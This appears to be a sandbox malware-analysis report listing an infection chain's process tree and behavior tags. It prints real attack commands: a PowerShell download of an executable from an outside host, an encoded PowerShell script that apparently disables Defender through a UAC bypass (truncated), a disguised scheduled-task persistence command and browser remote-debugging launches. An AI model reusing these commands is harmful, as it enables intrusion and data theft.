- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\u0k28.exe"C:\Users\Admin\AppData\Local\Temp\u0k28.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1u87m9.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1u87m9.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\10003000101\3790e4346a.exe"C:\Users\Admin\AppData\Local\Temp\10003000101\3790e4346a.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5192 -
C:\Users\Admin\AppData\Local\Temp\10003000101\3790e4346a.exe"C:\Users\Admin\AppData\Local\Temp\10003000101\3790e4346a.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3144
-
-
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"6⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5968 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵PID:3872
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"5⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:424 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
PID:4088 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 9607⤵
- Program crash
PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"6⤵PID:1272
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST7⤵
- Scheduled Task/Job: Scheduled Task
PID:4640
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"6⤵PID:4416
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3868
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
PID:2576 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x140,0x16c,0x7ffbe18edcf8,0x7ffbe18edd04,0x7ffbe18edd109⤵PID:5648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1912,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2148 /prefetch:39⤵PID:3696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=372,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2052 /prefetch:29⤵PID:1588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2428 /prefetch:89⤵PID:5152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3184 /prefetch:19⤵
- Uses browser remote debugging
PID:1100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3232 /prefetch:19⤵
- Uses browser remote debugging
PID:5188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4012,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4044 /prefetch:29⤵
- Uses browser remote debugging
PID:2340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4548,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4608 /prefetch:19⤵
- Uses browser remote debugging
PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5220,i,13444224933519081786,16342222630330850882,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5284 /prefetch:89⤵PID:5068
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
PID:6944 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch9⤵
- Uses browser remote debugging
PID:6960 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b8,0x7ffbd2bff208,0x7ffbd2bff214,0x7ffbd2bff22010⤵PID:6992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,1773020145267929846,1041025895359614493,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:310⤵PID:5352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,1773020145267929846,1041025895359614493,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:210⤵PID:5292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1252,i,1773020145267929846,1041025895359614493,262144 --variations-seed-version --mojo-platform-channel-handle=2604 /prefetch:810⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3516,i,1773020145267929846,1041025895359614493,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:110⤵
- Uses browser remote debugging
PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,1773020145267929846,1041025895359614493,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:110⤵
- Uses browser remote debugging
PID:5892
-
-
-
-
C:\ProgramData\4wtrqqimoz.exe"C:\ProgramData\4wtrqqimoz.exe"8⤵PID:4512
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5128
-
-
-
C:\ProgramData\4wbi5xt268.exe"C:\ProgramData\4wbi5xt268.exe"8⤵PID:3980
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:2008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 134810⤵
- Program crash
PID:17220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 136010⤵
- Program crash
PID:11372
-
-
-
-
C:\ProgramData\ln7qqqq90r.exe"C:\ProgramData\ln7qqqq90r.exe"8⤵PID:3948
-
C:\Users\Admin\AppData\Local\Temp\lxyHChlQ\GTopyzUYPyxXVXCv.exeC:\Users\Admin\AppData\Local\Temp\lxyHChlQ\GTopyzUYPyxXVXCv.exe 09⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\lxyHChlQ\qZj9TxQSIR7NJAKn.exeC:\Users\Admin\AppData\Local\Temp\lxyHChlQ\qZj9TxQSIR7NJAKn.exe 341210⤵PID:4292
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\w47qq" & exit8⤵PID:17308
-
C:\Windows\SysWOW64\timeout.exetimeout /t 119⤵
- Delays execution with timeout.exe
PID:11220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"6⤵PID:1272
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"6⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"7⤵PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028880101\17dffd538c.exe"C:\Users\Admin\AppData\Local\Temp\10028880101\17dffd538c.exe"6⤵PID:5140
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵PID:640
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028890101\b7a02d7a29.exe"C:\Users\Admin\AppData\Local\Temp\10028890101\b7a02d7a29.exe"6⤵PID:6920
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵PID:5284
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"4⤵PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"4⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"5⤵PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"4⤵PID:5156
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:4132
-
C:\Users\Admin\AppData\Roaming\Ko6OUDYHcl.exe"C:\Users\Admin\AppData\Roaming\Ko6OUDYHcl.exe"6⤵PID:1908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgA